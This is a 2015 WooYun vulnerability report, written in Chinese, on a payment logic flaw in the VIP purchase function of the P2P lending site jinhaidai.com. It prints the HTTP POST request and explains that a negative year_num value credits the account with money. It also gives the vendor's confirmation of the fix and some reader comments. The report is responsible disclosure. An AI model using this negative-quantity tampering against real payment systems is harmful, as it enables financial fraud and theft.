当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0115022

漏洞标题:p2p金融安全之金海贷严重逻辑漏洞

相关厂商:jinhaidai.com

漏洞作者: her0ma

提交时间:2015-05-19 22:55

修复时间:2015-07-04 10:34

公开时间:2015-07-04 10:34

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-19: 细节已通知厂商并且等待厂商处理中
2015-05-20: 厂商已经确认,细节仅向厂商公开
2015-05-30: 细节向核心白帽子及相关领域专家公开
2015-06-09: 细节向普通白帽子公开
2015-06-19: 细节向实习白帽子公开
2015-07-04: 细节向公众公开

简要描述:

p2p金融安全系列,之所以挖金海贷是因为我看到一张图,内容大体如下:
2015年520表白日即将来临,根据公司单身据多的特殊情况,结合公司的实际,应广大员工的要求,特批放假通知如下:2015年5月20日,全公司放假一天....
看到这个消息,做为一个曾经的单身狗,我觉得贵公司是有节操的公司~!

详细说明:

看图不说话:

22.jpg


购买VIP功能存在逻辑支付漏洞,如图:

2223.jpg


请求如下:
POST /vip/DirectBuy HTTP/1.1
Host: www.jinhaidai.com
JHD_CSRF_TOKEN=e377d26dd868aacc3254314e9143485530f31d96&year_num=1&tradepwd=hellocmd
将year_num的值修改成负数,然后提交购买,会发现帐号里多很多钱,如图:

3333.jpg


提现只是分分钟的事情,我也有机会成土豪的哈?不过做为一个有节操的白帽子,我只想第一时间告诉你们!
俩个测试帐号分别是hellocmd,hellotest,请讲里面的RMB都归零吧。如果有可能把我这俩帐号注销了也成。

漏洞证明:

3333.jpg

修复方案:

购买功能进行验证,对年份数字进行判断,或者进行后端前面验证

版权声明:转载请注明来源 her0ma@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-05-20 10:32

厂商回复:

非常感谢"her0ma"提供的漏洞,漏洞现已修复!

最新状态:

暂无


漏洞评价:

评论

  1. 2015-05-20 10:03 | 小川 认证白帽子 ( 核心白帽子 | Rank:1344 漏洞数:216 | 一个致力要将乌云变成搞笑论坛的男人)

    这下又得加班了

  2. 2015-05-20 10:33 | 啊L川 ( 普通白帽子 | Rank:195 漏洞数:39 | 菜鸟 ,菜渣, 菜呀!)

    司马大黑阔

  3. 2015-06-09 10:42 | 玉林嘎 ( 普通白帽子 | Rank:758 漏洞数:96 )

    恐怖!

  4. 2015-07-04 11:50 | Mr.Zhang ( 路人 | Rank:8 漏洞数:2 | 乌云上的段子手)

    特么单身狗又得回去加班了

  5. 2015-07-06 12:14 | Anders ( 路人 | Rank:2 漏洞数:2 | 测试工程师)

    司马大黑阔!!!